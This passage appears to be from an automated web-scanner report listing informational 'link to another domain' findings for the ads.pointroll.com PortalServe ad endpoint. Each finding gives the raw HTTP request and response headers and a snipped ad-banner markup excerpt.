var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=54;1=2;2=1;s=376;g=172;m=34;w=51;i=54;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-86E5-7DBA-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.57. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:49|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=40%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=40%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.012085812664751061 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-A2E0-3672-1209-8C0000510101; PRca=|AKKi*9708:16|AKEA*263:1|#; PRcp=|AKKiAC6a:16|AKEAAAEP:1|#; PRpl=|FQue:10|FQud:6|FFCo:1|#; PRcr=|GKiM:10|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:10|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:49:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-E0E0-7549-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:17|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:17|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:11|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:11|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:11|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=40;1=2;2=1;s=376;g=172;m=34;w=51;i=40;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-E0E0-7549-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.58. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:50|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=50%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=50%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.951707194285567 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-68E2-67AB-1209-8C0000510101; PRca=|AKKi*9708:21|AKEA*263:1|#; PRcp=|AKKiAC6a:21|AKEAAAEP:1|#; PRpl=|FQue:15|FQud:6|FFCo:1|#; PRcr=|GKiM:15|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:15|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:50:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-73E2-7B60-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:22|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:22|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:16|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:16|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:16|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=50;1=2;2=1;s=376;g=172;m=34;w=51;i=50;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-73E2-7B60-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.59. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:49|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=43%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=43%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.8226933866109316 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-10E1-390B-1209-8C0000510101; PRca=|AKKi*9708:18|AKEA*263:1|#; PRcp=|AKKiAC6a:18|AKEAAAEP:1|#; PRpl=|FQue:12|FQud:6|FFCo:1|#; PRcr=|GKiM:12|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:12|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:49:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-5EE1-ACAD-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:19|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:19|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:13|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:13|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:13|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=43;1=2;2=1;s=376;g=172;m=34;w=51;i=43;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-5EE1-ACAD-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.60. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:50|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=46%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=46%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.5853172993992083 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-5EE1-ACAD-1209-8C0000510101; PRca=|AKKi*9708:19|AKEA*263:1|#; PRcp=|AKKiAC6a:19|AKEAAAEP:1|#; PRpl=|FQue:13|FQud:6|FFCo:1|#; PRcr=|GKiM:13|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:13|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:50:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-F3E1-38AC-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:20|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:20|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:14|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:14|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:14|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=46;1=2;2=1;s=376;g=172;m=34;w=51;i=46;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-F3E1-38AC-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.61. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:50|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=49%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=49%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.2858923498858277 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-F6E1-9585-1209-8C0000510101; PRca=|AKKi*9708:20|AKEA*263:1|#; PRcp=|AKKiAC6a:20|AKEAAAEP:1|#; PRpl=|FQue:14|FQud:6|FFCo:1|#; PRcr=|GKiM:14|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:14|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:50:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-68E2-67AB-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:21|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:21|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:15|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:15|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:15|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=49;1=2;2=1;s=376;g=172;m=34;w=51;i=49;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-68E2-67AB-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.62. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:48|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=28%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=28%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.3209518375670171 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-27DD-82BB-1209-8C0000510101; PRca=|AKKi*9708:11|AKEA*263:1|#; PRcp=|AKKiAC6a:11|AKEAAAEP:1|#; PRpl=|FQue:5|FQud:6|FFCo:1|#; PRcr=|GKiM:5|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:5|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:48:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-82DD-7B42-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:12|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:12|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:6|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:6|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:6|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=28;1=2;2=1;s=376;g=172;m=34;w=51;i=28;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-82DD-7B42-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.63. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:49|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=31%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=31%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.6412831507845125 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-CCDD-8ED5-1209-8C0000510101; PRca=|AKKi*9708:13|AKEA*263:1|#; PRcp=|AKKiAC6a:13|AKEAAAEP:1|#; PRpl=|FQue:7|FQud:6|FFCo:1|#; PRcr=|GKiM:7|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:7|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:48:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-1CDE-D3C2-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:14|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:14|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:8|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:8|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:8|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=31;1=2;2=1;s=376;g=172;m=34;w=51;i=31;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-1CDE-D3C2-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.64. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:48|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=27%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=27%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.009267011563554417 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-B9DC-076C-1209-8C0000510101; PRca=|AKKi*9708:10|AKEA*263:1|#; PRcp=|AKKiAC6a:10|AKEAAAEP:1|#; PRpl=|FQue:4|FQud:6|FFCo:1|#; PRcr=|GKiM:4|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:4|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
